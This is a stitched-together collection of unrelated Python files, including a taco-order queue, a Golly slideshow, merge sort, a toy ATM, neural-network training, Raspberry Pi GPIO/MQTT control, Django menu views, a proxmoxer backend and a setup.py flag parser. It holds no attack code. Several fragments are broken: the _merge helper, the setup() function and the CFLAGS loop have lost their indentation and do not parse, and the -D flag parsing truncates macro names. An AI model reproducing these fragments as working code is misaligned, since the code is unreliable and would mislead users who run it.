                    queue_asada_tripa.put(suborder)
                elif meat_type == "Adobada" or meat_type == "Lengua":
                    queue_adobada_lengua.put(suborder)
                else:
                    queue_cabeza_suadero_veggie.put(suborder)
        time.sleep(1)
def taquero1(orderQueue):
    """Takes orders from corresponding queue and processes them.

    processOrder returns [order, done]; unfinished suborders are put back
    on the queue to be retried after other work.
    """
    while True:
        processed_order = processOrder(orderQueue.get())
        if not processed_order[1]:
            orderQueue.put(processed_order[0])
        time.sleep(2)
def processOrder(order):
    """Try to make up to 5 tacos for one suborder; update shared bookkeeping.

    Returns [order, True] once the whole parent order is finished (response
    sent), otherwise [order, False] so the caller can requeue the suborder.
    Step codes used via addStep: 1 running, 2 paused, 3 missing ingredient,
    4 finished.
    """
    # part_id is "<36-char parent-order id><suffix>"; the prefix keys the
    # shared orders_in_progress / distributed_orders dicts.
    order_id = order["part_id"][:36]
    suborder_id = order["part_id"]
    tacos_made = 5
    addStep(order, 1)
    meat_type = order["meat"]
    # Availability check before consuming anything.
    # NOTE(review): these reads happen without holding `lock`; another
    # thread may change the counts between this check and the decrements
    # below.
    for ingrediente in order["ingredients"]:
        if ingredientes[ingrediente] < tacos_made:
            if meat_type == "Asada" or meat_type == "Tripa":
                if tortillas[0] < tacos_made:
                    addStep(order, 3)
                    return [order, False]
            elif meat_type == "Adobada" or meat_type == "Lengua":
                if tortillas[1] < tacos_made:
                    addStep(order, 3)
                    return [order, False]
            else:
                if tortillas[2] < tacos_made:
                    addStep(order, 3)
                    return [order, False]
            addStep(order, 3)
            return [order, False] # Skips order, next one might not use the missing ingredient, minimizing downtime
    # Consume tortillas from the station matching the meat type.
    if meat_type == "Asada" or meat_type == "Tripa":
        lock.acquire()
        tortillas[0] -= tacos_made
        lock.release()
    elif meat_type == "Adobada" or meat_type == "Lengua":
        lock.acquire()
        tortillas[1] -= tacos_made
        lock.release()
    else:
        lock.acquire()
        tortillas[2] -= tacos_made
        lock.release()
    for ingrediente in order["ingredients"]:
        lock.acquire()
        ingredientes[ingrediente] -= tacos_made # Use up 1 unit per taco
        lock.release()
    if orders_in_progress[order_id][suborder_id]["quantity"] > 0: # Remove tacos from order
        if orders_in_progress[order_id][suborder_id]["quantity"] < tacos_made:
            orders_in_progress[order_id][suborder_id]["quantity"] = 0
        else:
            orders_in_progress[order_id][suborder_id]["quantity"] -= tacos_made
    if orders_in_progress[order_id][suborder_id]["quantity"] < 1:
        # Suborder complete; decrement the parent's outstanding-size counter.
        print("FINISHED ------------------")
        addStep(order, 4)
        print(orders_in_progress)
        order_id = order["part_id"][:36]
        lock.acquire()
        orders_in_progress[order_id]["size"] -= 1
        lock.release()
        if orders_in_progress[order_id]["size"] == 0:
            # Delete the order from SQS using the receipt handle
            receipt = distributed_orders[order_id]["ReceiptHandle"]
            distributed_orders[order_id]["ReceiptHandle"] = "Deleted"
            # deleteSQS(receipt)
            print("DELETE", receipt)
            sendResponse(order)
            lock.acquire()
            orders_in_progress.pop(order_id)
            lock.release()
        return [order, True]
    addStep(order, 2)
    return [order, False]
def addStep(order, state):
    """Append a timestamped step record to the parent order's step list.

    State codes: 1 - Running, 2 - Paused, 3 - Missing ingredient,
    4 - Finished.  Also stamps endTime on the previous step, and on this
    step itself when the order is finished.
    """
    current_state = []
    if state == 1:
        current_state = ["Running", "Working on order"]
    elif state == 2:
        current_state = ["Suspended", "Next order"]
    elif state == 3:
        current_state = ["Suspended", "Waiting on ingredient"]
    elif state == 4:
        current_state = ["Finished", "Order finished"]
    else:
        current_state = ["Unknown", "Unknown"]
    order_id = order["part_id"][:36]
    suborder_id = order["part_id"]
    lock.acquire()
    next_step = len(orders_in_progress[order_id]["steps"]) + 1
    now = time.strftime("%Y-%m-%d %H:%M:%S")
    orders_in_progress[order_id]["steps"].append({
        "step": next_step,
        "state": current_state[0],
        "action": current_state[1],
        "part_id": suborder_id,
        "startTime": now
    })
    lock.release()
    # NOTE(review): the endTime updates below happen outside the lock.
    if next_step > 1:
        orders_in_progress[order_id]["steps"][next_step-2].update({"endTime":now})
    if state == 4:
        orders_in_progress[order_id]["steps"][next_step-1].update({"endTime":now})
def sendResponse(order):
    """Assemble the final answer message for a finished order.

    NOTE(review): `json` is not imported in this module directly; it must be
    supplied by `from SQS import *`.  The actual send (putSQS) is commented
    out, so currently this only prints the message.
    """
    # TODO: Send response to sqs based on order in progress info
    print()
    order_stats = orders_in_progress[order["part_id"][:36]]
    message = {"answer":{
        "start_time":order_stats["start_time"],
        "end_date": order_stats["steps"][-1]["endTime"],
        "steps":order_stats["steps"]
    }}
    # Merge the original request fields into the reply.
    message.update(distributed_orders[order["part_id"][:36]])
    print(message)
    message = json.dumps(message)
    # putSQS(message)
|
# Display all patterns in Golly's Patterns folder.
# Author: Andrew Trevorrow (andrew@trevorrow.com), March 2006.
import golly as g
import os
from os.path import join
from time import sleep
# ------------------------------------------------------------------------------
def slideshow ():
    """Open every pattern under Golly's Patterns folder, one per keypress.

    Space advances to the next pattern; escape (handled by Golly itself)
    aborts the script.  Restores the original algo/rule only if the whole
    walk completes.
    """
    oldalgo = g.getalgo()
    oldrule = g.getrule()
    message = "Hit space to continue or escape to exit the slide show..."
    g.show(message)
    for root, dirs, files in os.walk(g.getdir("app") + "Patterns"):
        for name in files:
            if name.startswith("."):
                # ignore hidden files (like .DS_Store on Mac)
                pass
            else:
                g.new("")
                g.setalgo("QuickLife") # nicer to start from this algo
                fullname = join(root, name)
                g.open(fullname, False) # don't add file to Open/Run Recent submenu
                g.update()
                if name.endswith(".lua") or name.endswith(".py"):
                    # reshow message in case it was changed by script
                    g.show(message)
                # block until the user hits space, servicing other events
                while True:
                    event = g.getevent()
                    if event == "key space none": break
                    g.doevent(event) # allow keyboard/mouse interaction
                    sleep(0.01) # avoid hogging cpu
    # if all patterns have been displayed then restore original algo and rule
    # (don't do this if user hits escape in case they want to explore pattern)
    g.new("untitled")
    g.setalgo(oldalgo)
    g.setrule(oldrule)
# ------------------------------------------------------------------------------
# show status bar but hide other info to maximize viewport
# (setoption returns the previous value, which we keep for restoring)
oldstatus = g.setoption("showstatusbar", True)
oldtoolbar = g.setoption("showtoolbar", False)
oldlayerbar = g.setoption("showlayerbar", False)
oldeditbar = g.setoption("showeditbar", False)
oldfiles = g.setoption("showfiles", False)
try:
    slideshow()
finally:
    # this code is always executed, even after escape/error;
    # clear message line in case there was no escape/error
    g.show("")
    # restore original state
    g.setoption("showstatusbar", oldstatus)
    g.setoption("showtoolbar", oldtoolbar)
    g.setoption("showlayerbar", oldlayerbar)
    g.setoption("showeditbar", oldeditbar)
    g.setoption("showfiles", oldfiles)
|
"""Merge sort algorithm."""
def merge_sort(a_list):
    """Use MS to sort the provided list and return it.

    Classic divide-and-conquer: split in half, sort each half recursively,
    merge.  Stable (ties favour the left half); the input list itself is
    never mutated.  Raises TypeError for non-list input.
    """
    if not isinstance(a_list, list):
        raise TypeError("Only list is a valid input type!")
    if len(a_list) < 2:
        return a_list
    mid = len(a_list) // 2
    left = merge_sort(a_list[:mid])
    right = merge_sort(a_list[mid:])
    # Merge the two sorted halves into one sorted list.
    merged = []
    i = j = 0
    while i < len(left) and j < len(right):
        if left[i] <= right[j]:
            merged.append(left[i])
            i += 1
        else:
            merged.append(right[j])
            j += 1
    merged.extend(left[i:])
    merged.extend(right[j:])
    return merged
def _merge(part_a, part_b):
"""."""
temp = []
while part_a and part_b:
if part_a[0] <= part_b[0]:
temp.append(part_a.pop(0))
else:
temp.append(part_b.pop(0))
while part_a:
temp.append(part_a.pop(0))
while part_b:
temp.append(part_b.pop(0))
return temp
if __name__ == '__main__':  # pragma: no cover
    # Crude timing comparison of best/worst/random inputs via timeit
    # (default number of iterations, so this can take a while).
    import timeit as ti
    import random
    best_case = [1, 2, 3, 4, 5]
    worst_case = [5, 4, 3, 2, 1]
    # NOTE(review): this rebinds the name `random` from the module to a
    # list, shadowing the import above.
    random = [random.randint(1, 100) for i in range(10)]
    time_1 = ti.timeit("merge_sort(best_case)",
                       setup="from __main__ import best_case, merge_sort")
    time_2 = ti.timeit("merge_sort(worst_case)",
                       setup="from __main__ import worst_case, merge_sort")
    time_3 = ti.timeit("merge_sort(random)",
                       setup="from __main__ import random, merge_sort")
    print("""
Mergesort sorts shit by merging it.
Input:[1, 2, 3, 4, 5]
Sort time: {}
Input:[5, 4, 3, 2, 1]
Sort time: {}
Input:list(range(5, 0, -1))
Sort time: {}
""".format(time_1, time_2, time_3))
import urllib.request
import os
import sys
def downloadImages(strQueryString, arrUrls):
    """Download every image URL in *arrUrls* for the given query string."""
    for image_url in arrUrls:
        downloadImage(strQueryString, image_url)
def downloadImage(strQueryString, url):
    """Download one image URL into the query's directory, logging failures.

    Any exception (bad URL, network error, unwritable directory) is printed
    rather than propagated, so a single bad URL does not stop a batch.
    """
    try:
        target_dir = setup(strQueryString)
        print(f"Downloading {url} to {strQueryString}")
        file_name = str(url).split('/')[-1]
        download_jpg(url, target_dir, file_name)
    except Exception as error:
        print(error)
def download_jpg(url, filePath, fileName):
    """Fetch *url* and store it as *fileName* inside *filePath*."""
    destination = f"{filePath}/{fileName}"
    urllib.request.urlretrieve(url, destination)
def setup(strQueryString):
dirName = 'images_' + strQueryString.replace(' ', '_')
strPath = f"{dirName}"
try:
os.mkdir(strPath)
except:
pass
return strPath
|
import time
# Minimal single-session console ATM simulation: verify a hard-coded PIN,
# then run exactly one menu transaction. Withdrawals are simulated only;
# `amount` is never actually updated.
print("Welcome to MY ATM")
print("Swipe Card")
amount = 1000000  # displayed account balance
o = "4078"        # expected PIN
print("_________________")
p = input("enter pin")
print("Verifying.......!!")
time.sleep(3)  # cosmetic "processing" delay
if p == o:
    print("1.Cash Withdrawl")
    print("2.Check enquiry")
    print("3.Balance enquiry")
    print("4.Print receipt")
    print("5.Mini Statement")
    print("6.Exit")
    ch = int(input("enter your choice"))
    if ch == 1:
        print("c.Current")
        print("s.Savings")
        print("________________")
        h = input("enter your option")
        if h == 'c':
            wdraw = input("enter the amount to be withdraw:")
            print("Transaction Done")
            print("Take Amount")
            print("Hope you had nice time")
        else:
            sdraw = input("enter the amount to withdraw:")
            print("Transaction Successful")
            print("Take amount")
            print("Hope you had nice time")
    elif ch == 2:
        print(f"Current Balance is {amount}")
        print("Hope you had nice time")
    elif ch == 3:
        print(f"Balance is {amount}")
        print("Hope you had nice time")
    elif ch == 4:
        # Bug fix: the original prompt lacked the f prefix, so the literal
        # text "{amount}" was shown instead of the balance.
        yn = input(f"Print Receipt.{amount} yes/no")
        if yn == 'yes':
            print("Take Receipt")
        elif yn == 'no':
            print("Hope you had nice time")
        else:
            print("error 404")
    elif ch == 5:
        print("Take your mini statement of balance")
        print("Hope you had nice time")
    elif ch == 6:
        exit()
    else:
        print("error")
else:
    print("Invalid Pin ,Try again")
|
import numpy as np
import matplotlib.pyplot as mp
import time
from NeuralNetwork import Neural_Network
fileStr = 'C:\\Users\\WahSeng\\Desktop\\Neural Network Tutorial\\TrainingData.txt'

# Load whitespace-separated training data: columns 0-1 are inputs, column 2
# is the target output.
data = np.genfromtxt(fileStr)
tin = data[:,0:2]
tout = data[:,2:3]

# Normalize every column to [0, 1] by dividing by its maximum; the maxima are
# kept to de-normalize predictions at the end.
maxTin1 = np.max(tin[:,0])
maxTin2 = np.max(tin[:,1])
maxTout = np.max(tout)
tin[:,0] = tin[:,0] / maxTin1
tin[:,1] = tin[:,1] / maxTin2
tout = tout / maxTout

print('Training')
# Bug fix: time.clock() was deprecated in Python 3.3 and removed in 3.8;
# perf_counter() is the documented replacement for elapsed-time measurement.
startTime = time.perf_counter()

# Plain full-batch gradient descent until the cost drops below the threshold.
scalar = 3.  # learning rate
nn = Neural_Network()
cost = nn.costFunction(tin, tout)
costArray = cost
while cost > 0.01:
    dJdW1, dJdW2 = nn.costFunctionPrime(tin, tout)
    nn.W1 = nn.W1 - scalar * dJdW1
    nn.W2 = nn.W2 - scalar * dJdW2
    cost = nn.costFunction(tin, tout)
    print(cost)
    costArray = np.append(costArray, cost)
endTime = time.perf_counter()
print('Total Time :', endTime - startTime)
print(tin)
print(nn.yHat)

# Persist trained weights (numpy text format plus human-readable dumps);
# `with` guarantees the handles are closed even on error.
np.savetxt('W1.out', nn.W1)
np.savetxt('W2.out', nn.W2)
with open('C:\\Users\\WahSeng\\Desktop\\Neural Network Tutorial\\W1.txt', 'w') as fout:
    fout.write(str(nn.W1))
with open('C:\\Users\\WahSeng\\Desktop\\Neural Network Tutorial\\W2.txt', 'w') as fout:
    fout.write(str(nn.W2))

# Plot the training curve; -1/log(cost) spreads small cost values visually.
mp.plot(-1 / np.log(costArray), 'b-^')
mp.title('Cost function')
mp.xlabel('Iteration')
mp.ylabel('Cost')
mp.show()
# Predict for one normalized input and scale back to original units.
print(nn.forward([800 / maxTin1, 1 / maxTin2]) * maxTout)
|
# For each letter a-z, print the index of its first occurrence in the input
# word (or -1 if the letter does not occur), space-separated on one line.
# (A commented-out earlier draft of the same logic was removed.)
word = input()
alpha = 'abcdefghijklmnopqrstuvwxyz'
for letter in alpha:
    # str.find already returns -1 for a missing substring, so the original
    # `in` membership test followed by .index (two scans) is unnecessary.
    print(word.find(letter), end=' ')
from serial import Serial
import RPi.GPIO as GPIO
import time
import paho.mqtt.client as mqtt
# Serial link to the Arduino providing sensor readings.
ser=Serial("/dev/ttyACM0",9600) #change ACM number as found from ls /dev/tty/ACM*
ser.baudrate=9600  # redundant with the constructor argument, but harmless
def blink(pin):
    """Pulse *pin*: one second high, then one second low."""
    for level in (GPIO.HIGH, GPIO.LOW):
        GPIO.output(pin, level)
        time.sleep(1)
    return
def display8numero(numero, lugar):
    """Drive one digit of a multiplexed 4-digit 7-segment display.

    Args:
        numero: digit 0-9 to display (segment lines are active-low here:
            LOW lights a segment).
        lugar: digit position 0-3 (digit-select lines are active-high).

    Values outside those ranges leave all digits deselected / all segments
    off for this refresh, matching the original if-chain behavior.

    The original was ~120 lines of repeated if-blocks; the pin states are
    identical, now expressed as lookup tables.
    """
    # Segment pins A..G and digit-select pins D1..D4 (BOARD numbering),
    # copied from the original assignments.
    seg_pins = (21, 33, 11, 5, 3, 23, 13)   # A, B, C, D, E, F, G
    digit_pins = (19, 31, 29, 15)           # D1, D2, D3, D4
    # Per-digit segment levels, 1 -> GPIO.HIGH (segment off), 0 -> LOW (on).
    # Transcribed verbatim from the original branches, including its
    # (unusual) pattern for 9.
    patterns = {
        0: (0, 0, 0, 0, 0, 0, 1),
        1: (1, 0, 0, 1, 1, 1, 1),
        2: (0, 0, 1, 0, 0, 1, 0),
        3: (0, 0, 0, 0, 1, 1, 0),
        4: (1, 0, 0, 1, 1, 0, 0),
        5: (0, 1, 0, 0, 1, 0, 0),
        6: (0, 1, 0, 0, 0, 0, 0),
        7: (0, 0, 0, 1, 1, 1, 1),
        8: (0, 0, 0, 0, 0, 0, 0),
        9: (0, 0, 0, 1, 1, 0, 0),
    }
    # Deselect every digit and blank every segment first.
    for pin in digit_pins:
        GPIO.output(pin, GPIO.LOW)
    for pin in seg_pins:
        GPIO.output(pin, GPIO.HIGH)
    # Enable only the requested digit position.
    if 0 <= lugar <= 3:
        GPIO.output(digit_pins[lugar], GPIO.HIGH)
    # Apply the digit's segment pattern, if the digit is known.
    levels = patterns.get(numero)
    if levels is not None:
        for pin, high in zip(seg_pins, levels):
            GPIO.output(pin, GPIO.HIGH if high else GPIO.LOW)
GPIO.setmode(GPIO.BOARD)  # physical (BOARD) pin numbering
GPIO.setup(37, GPIO.OUT)  # PWM output pin
# 50 Hz PWM on pin 37; duty cycle is adjusted in on_message (presumably a
# servo given the 7.5 neutral duty -- confirm against the hardware).
p = GPIO.PWM(37,50)
p.start(7.5)
def on_connect(client, userdata, flags, rc):
    """MQTT connect callback: log the result code and (re)subscribe.

    Subscribing here means the subscription is restored automatically after
    any reconnect. (Bug fix: the log message was missing the space before
    the result code, printing e.g. "result code0".)
    """
    print("Connected with result code " + str(rc))
    client.subscribe("sensores")
def on_message(client, userdata, msg):
    """MQTT message callback: convert the payload to degrees and drive the PWM.

    Bug fix: msg.payload is bytes in paho-mqtt, so the original
    ``int(str(msg.payload))`` produced the text "b'...'" under Python 3 and
    raised ValueError; decode the bytes before parsing.
    """
    grados = int(msg.payload.decode())
    print(grados)
    # 7.5 is the base duty cycle set at startup; 0.06 duty units per degree.
    p.ChangeDutyCycle(7.5+(0.06*grados))
    print(msg.topic+" "+str(msg.payload))
# Configure every 7-segment display pin (segments and digit selects) as output.
GPIO.setup(3, GPIO.OUT)
GPIO.setup(5, GPIO.OUT)
GPIO.setup(11, GPIO.OUT)
GPIO.setup(13, GPIO.OUT)
GPIO.setup(15, GPIO.OUT)
GPIO.setup(19, GPIO.OUT)
GPIO.setup(21, GPIO.OUT)
GPIO.setup(23, GPIO.OUT)
GPIO.setup(29, GPIO.OUT)
GPIO.setup(31, GPIO.OUT)
GPIO.setup(33, GPIO.OUT)
numero = 0
lugar = 0
idx = 0
# MQTT client: on_connect (re)subscribes, on_message drives the PWM output.
client = mqtt.Client(client_id="lautaro")
client.on_connect = on_connect
client.on_message = on_message
client.connect("192.168.3.22",1883,60)
client.subscribe("sensores")
client.loop_start()  # MQTT traffic handled on a background thread
data = "0"
data2 = "0"
posicion = 0
while True:
    # One reading per iteration from the Arduino over serial.
    read_ser=ser.readline()
    data = read_ser.strip().decode("utf-8")
    # Refresh the multiplexed display: redraw each digit of the last
    # accepted value (data2) repeatedly so all digits appear lit at once.
    for a in range(200):
        for l in range(len(data2)):
            display8numero(int(data2[l]),(int(l)))
    idx += 1
    if (idx % 50) == 0:
        # Every 50th serial reading becomes the newly displayed value.
        print(data)
        data2 = data
        idx = 0
|
"""
This module describes the data model for the "order_associations" table.
Rows of order_associations are managed through SQLAlchemy.
It provides a many-to-many relation between order and menu item,
carrying the ordered quantity.
"""
from sqlalchemy import (
Column,
Integer,
ForeignKey,
)
from sqlalchemy.orm import relationship
from .meta import Base
class OrderAssoc(Base):
    """
    Association object for the "order_associations" table.

    Links one menu item to one order together with a quantity, providing
    the many-to-many relation between orders and menu items.
    """
    __tablename__ = 'order_associations'
    # Surrogate primary key for the association row.
    id = Column(Integer, primary_key=True)
    # How many units of the linked menu item belong to the order.
    quantity = Column(Integer)
    item_id = Column(Integer, ForeignKey('menu_items.id'))
    order_id = Column(Integer, ForeignKey('orders.id'))
    # ORM navigation to the two linked rows.
    order = relationship('Order')
    food = relationship('MenuItem')
|
from django.conf.urls import url
from mrbelvedereci.github import views as github_views
urlpatterns = [
    # Repository list at the app root.
    url(r'^$', github_views.repo_list),
    # Branch detail: /repo/<owner>/<name>/branch/<branch>
    url(r'^repo/(?P<owner>\w+)/(?P<name>[^/].*)/branch/(?P<branch>.*)$', github_views.branch_detail),
    # Commit detail: /repo/<owner>/<name>/commit/<sha>
    url(r'^repo/(?P<owner>\w+)/(?P<name>[^/].*)/commit/(?P<sha>\w+)$', github_views.commit_detail),
    # Repository detail; listed after the more specific patterns above so
    # they win first (pattern order matters in URL resolution).
    url(r'^repo/(?P<owner>\w+)/(?P<name>[^/].*)/*$', github_views.repo_detail),
    # Endpoint for GitHub push webhooks.
    url(r'^webhook/github/push$', github_views.github_push_webhook),
]
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_bcrypt import Bcrypt
from shop.config import DevConfig
from flask_migrate import Migrate
# Module-level Flask app plus its extensions (no application factory).
app=Flask(__name__)
app.config.from_object(DevConfig)  # development configuration object
db=SQLAlchemy(app)
bcrypt=Bcrypt(app)  # password hashing helper
login_manager=LoginManager(app)
migrate=Migrate(app,db)
# Imported last so the views module can import `app`/`db` from this package
# without triggering a circular import.
from shop import views
|
from django.shortcuts import render,redirect, get_object_or_404
from django.contrib.sites.shortcuts import get_current_site
from django.contrib.auth.decorators import permission_required
from ..views import staff_member_required
from django.contrib.sites.shortcuts import get_current_site
from django.template.response import TemplateResponse
from menu.models import Menu, MenuItem
from core.utils import get_paginator_items
from dashboard.menu.utils import get_menu_obj_text, update_menu
from django.contrib import messages
from django.utils.translation import pgettext_lazy
from django.http import JsonResponse
from django.db.models import Q
from django.urls import reverse
from .forms import AssignMenuForm, MenuForm, MenuItemForm
from page.models import Page
from menu.models import Category
# Create your views here.
@staff_member_required
@permission_required('core.manage_settings')
def index(request):
    """List all menus (paginated) and handle the storefront menu-assignment form.

    The assignment form binds the current site's settings; on a valid POST
    it saves and redirects back to this view.
    """
    menus = Menu.objects.all()
    menus = get_paginator_items(menus, request.GET.get('page'))
    site_settings = get_current_site(request).settings
    assign_menu_form = AssignMenuForm(
        request.POST or None, instance=site_settings)
    if request.POST and assign_menu_form.is_valid():
        assign_menu_form.save()
        msg = pgettext_lazy(
            'Dashboard message', 'Updated storefront menus')
        messages.success(request, msg)
        return redirect('dashboard:menu-index')
    ctx = {
        'menus': menus,
        'assign_menu_form': assign_menu_form,
        'site_settings': site_settings,
    }
    # Bug fix: the original return line ended with a stray `\` continuation,
    # splicing the next view's @staff_member_required decorator into this
    # statement as a matrix-multiplication operand.
    return TemplateResponse(request, 'dashboard/menu/index.html', ctx)
@staff_member_required
@permission_required('core.manage_settings')
def menu_details(request, pk):
    """Show a menu's top-level items, with their category/page prefetched."""
    menu = get_object_or_404(Menu, pk=pk)
    menu_items = menu.items.filter(parent=None).prefetch_related(
        'category', 'page')
    ctx = {
        'menu': menu,
        'menu_items': menu_items,
    }
    # Bug fix: the original return line ended with a stray `\` continuation,
    # splicing the next view's decorator into this statement as a `@`
    # matrix-multiplication operand.
    return TemplateResponse(request, 'dashboard/menu/details.html', ctx)
@staff_member_required
@permission_required('core.manage_settings')
def menu_item_details(request, menu_pk, item_pk):
    """Render the detail page for one menu item, listing its direct children."""
    menu = get_object_or_404(Menu, pk=menu_pk)
    item = menu.items.get(pk=item_pk)
    children = item.get_children().order_by('sort_order')
    context = {
        'menu': menu,
        'menu_items': children,
        'menu_item': item,
    }
    return TemplateResponse(
        request, 'dashboard/menu/item/details.html', context)
@staff_member_required
@permission_required('core.manage_settings')
def menu_create(request):
    """Create a new menu: render the form on GET, save on a changed valid POST."""
    menu = Menu()
    # Consistency/bug fix: bind POST data only when present (`or None`),
    # matching menu_edit; binding the empty QueryDict on GET made the form
    # bound-but-empty, which surfaces spurious validation errors.
    menu_form = MenuForm(request.POST or None, instance=menu)
    if menu_form.is_valid() and menu_form.has_changed() and request.POST:
        menu = menu_form.save()
        msg = pgettext_lazy('Dashboard message', 'Added menu %s') % (menu,)
        messages.success(request, msg)
        return redirect('dashboard:menu-index')
    ctx = {
        'form': menu_form,
        'menu': menu
    }
    return TemplateResponse(request, 'dashboard/menu/form.html', ctx)
@staff_member_required
@permission_required('menu.manage_menus')
def menu_edit(request, pk):
    """Edit an existing menu; on a changed, valid POST save and redirect."""
    menu = get_object_or_404(Menu, pk=pk)
    form = MenuForm(request.POST or None, instance=menu)
    if form.is_valid() and form.has_changed() and request.POST:
        menu = form.save()
        messages.success(
            request,
            pgettext_lazy('Dashboard message', 'Updated menu %s') % (menu,))
        return redirect('dashboard:menu-details', pk=menu.pk)
    context = {'form': form, 'menu': menu}
    return TemplateResponse(request, 'dashboard/menu/form.html', context)
@staff_member_required
@permission_required('menu.manage_menus')
def menu_delete(request, pk):
    """Show the delete-confirmation modal (GET) or delete the menu (POST)."""
    menu = get_object_or_404(Menu, pk=pk)
    if request.method != 'POST':
        context = {'menu': menu, 'descendants': list(menu.items.all())}
        return TemplateResponse(
            request, 'dashboard/menu/modal/confirm_delete.html', context)
    menu.delete()
    messages.success(
        request,
        pgettext_lazy('Dashboard message', 'Removed menu %s') % (menu,))
    return redirect('dashboard:menu-list')
@staff_member_required
@permission_required('menu.manage_menus')
def ajax_menu_links(request):
    """Return JSON groups of linkable objects (categories, pages) for the menu form."""
    def get_obj_repr(obj):
        # Encode pk + model class name so the form can resolve the target.
        obj_id = str(obj.pk) + '_' + obj.__class__.__name__
        return {
            'id': obj_id,
            'text': get_menu_obj_text(obj)}
    def get_group_repr(model, label, filter_fields, query):
        # NOTE: reads `search_query` from the enclosing scope; it is assigned
        # below, but before this closure is first called.
        queryset = model.objects.all()
        # Filter by the query only when it does not match the group label
        # itself -- presumably so that searching e.g. "page" returns every
        # page; confirm against the widget's expected behavior.
        if search_query and search_query.lower() not in label.lower():
            kwargs = {
                '%s__contains' % (field,): query for field in filter_fields}
            queryset = queryset.filter(Q(**kwargs))
        return {
            'text': label,
            'children': [get_obj_repr(obj) for obj in queryset]}
    search_query = request.GET.get('q', '')
    groups = [
        get_group_repr(
            Category,
            pgettext_lazy('Link object type group description', 'Category'),
            ('name',),
            search_query),
        get_group_repr(
            Page,
            pgettext_lazy('Link object type group description', 'Page'),
            ('title',),
            search_query)
    ]
    # Drop groups with no matching children.
    groups = [group for group in groups if len(group.get('children')) > 0]
    return JsonResponse({'results': groups})
@staff_member_required
@permission_required('menu.manage_menus')
def menu_item_create(request, menu_pk, root_pk=None):
    """Create a menu item, optionally nested under the item *root_pk*."""
    menu = get_object_or_404(Menu, pk=menu_pk)
    if root_pk:
        parent = get_object_or_404(MenuItem, pk=root_pk)
        path = parent.get_ancestors(include_self=True)
        menu_item = MenuItem(menu=menu, parent=parent)
    else:
        path = None
        menu_item = MenuItem(menu=menu)
    form = MenuItemForm(request.POST or None, instance=menu_item)
    if form.is_valid():
        menu_item = form.save()
        messages.success(
            request,
            pgettext_lazy('Dashboard message', 'Added menu item %s')
            % (menu_item,))
        update_menu(menu)
        if root_pk:
            return redirect(
                'dashboard:menu-item-details',
                menu_pk=menu.pk, item_pk=root_pk)
        return redirect('dashboard:menu-details', pk=menu.pk)
    context = {
        'form': form, 'menu': menu, 'menu_item': menu_item, 'path': path}
    return TemplateResponse(request, 'dashboard/menu/item/form.html', context)
@staff_member_required
@permission_required('menu.manage_menus')
def menu_item_delete(request, menu_pk, item_pk):
    """Confirm (GET) and perform (POST) deletion of one menu item."""
    menu = get_object_or_404(Menu, pk=menu_pk)
    menu_item = get_object_or_404(menu.items.all(), pk=item_pk)
    if request.method == 'POST':
        menu_item.delete()
        # Rebuild the cached/denormalized menu after the structural change.
        update_menu(menu)
        msg = pgettext_lazy(
            'Dashboard message', 'Removed menu item %s') % (menu_item,)
        messages.success(request, msg)
        # NOTE: parent is read *after* delete(); this relies on the in-memory
        # instance keeping its field values once the row is gone.
        root_pk = menu_item.parent.pk if menu_item.parent else None
        if root_pk:
            redirect_url = reverse(
                'dashboard:menu-item-details', kwargs={
                    'menu_pk': menu_item.menu.pk, 'item_pk': root_pk})
        else:
            redirect_url = reverse(
                'dashboard:menu-details', kwargs={'pk': menu.pk})
        # AJAX callers receive the redirect target as JSON instead of a 302.
        # NOTE(review): request.is_ajax() was removed in Django 4.0 -- confirm
        # the project's Django version.
        return (
            JsonResponse({'redirectUrl': redirect_url}) if request.is_ajax()
            else redirect(redirect_url))
    ctx = {
        'menu_item': menu_item,
        'descendants': list(menu_item.get_descendants())}
    return TemplateResponse(
        request, 'dashboard/menu/item/modal/confirm_delete.html', ctx)
@staff_member_required
@permission_required('menu.manage_menus')
def menu_item_edit(request, menu_pk, item_pk):
    """Edit a menu item; on success rebuild the menu cache and redirect."""
    menu = get_object_or_404(Menu, pk=menu_pk)
    item = get_object_or_404(menu.items.all(), pk=item_pk)
    breadcrumb = item.get_ancestors(include_self=True)
    form = MenuItemForm(request.POST or None, instance=item)
    if form.is_valid():
        item = form.save()
        update_menu(menu)
        messages.success(
            request,
            pgettext_lazy('Dashboard message', 'Saved menu item %s') % (item,))
        return redirect(
            'dashboard:menu-item-details', menu_pk=menu.pk, item_pk=item_pk)
    context = {
        'form': form, 'menu': menu, 'menu_item': item, 'path': breadcrumb}
    return TemplateResponse(request, 'dashboard/menu/item/form.html', context)
|
__author__ = "Markus Reiter"
__copyright__ = "(c) Markus Reiter 2022"
__license__ = "MIT"
import shutil
from subprocess import PIPE, Popen
from proxmoxer.backends.command_base import CommandBaseBackend, CommandBaseSession
class LocalSession(CommandBaseSession):
    """Session that runs CLI commands directly on the local machine."""

    def _exec(self, cmd):
        """Run *cmd* locally and return its decoded (stdout, stderr) pair."""
        proc = Popen(cmd, stdout=PIPE, stderr=PIPE)
        out, err = proc.communicate(timeout=self.timeout)
        return out.decode(), err.decode()

    def upload_file_obj(self, file_obj, remote_path):
        """Copy *file_obj* to *remote_path* on the local filesystem."""
        with open(remote_path, "wb") as dest:
            shutil.copyfileobj(file_obj, dest)
class Backend(CommandBaseBackend):
    """Command backend whose session executes against the local host."""

    def __init__(self, *args, **kwargs):
        self.target = "localhost"
        self.session = LocalSession(*args, **kwargs)
|
import sys
import os
from distutils.core import setup, Extension
incDirList= []
libDirList= []
libList= []
defList= []
undefList= []
otherCompileFlags= []
otherLinkFlags= []
if 'CFLAGS' in os.environ:
cflags= os.environ['CFLAGS']
else:
cflags= ''
words= cflags.split()
for word in words:
if word.startswith('-D'):
word= word[2:]
loc= word.find('=')
if (loc>=0):
defList.append((word[:loc-1],word[loc+1:]))
else:
defList.append((word,None))
elif word.startswith('-U'):
undefList.append(word[2:])
elif word.startswith('-I'):
incDirList.append(word[2:])
else:
otherCompileFlags.append(word)
# Parse LFLAGS into library dirs (-L), libraries (-l) and other link flags.
lflags = os.environ.get('LFLAGS', '')
for word in lflags.split():
    if word.startswith('-L'):
        libDirList.append(word[2:])
    elif word.startswith('-l'):
        libList.append(word[2:])
    else:
        otherLinkFlags.append(word)
# Obtain the numpy include directory. This logic works across numpy versions.
try:
    import numpy
    numpy_include = numpy.get_include()
except ImportError:
    sys.exit("The python package 'numpy' is not installed!")
except AttributeError:
    # Fallback for very old numpy releases that predate get_include().
    numpy_include = numpy.get_numpy_include()
incDirList.append(numpy_include)
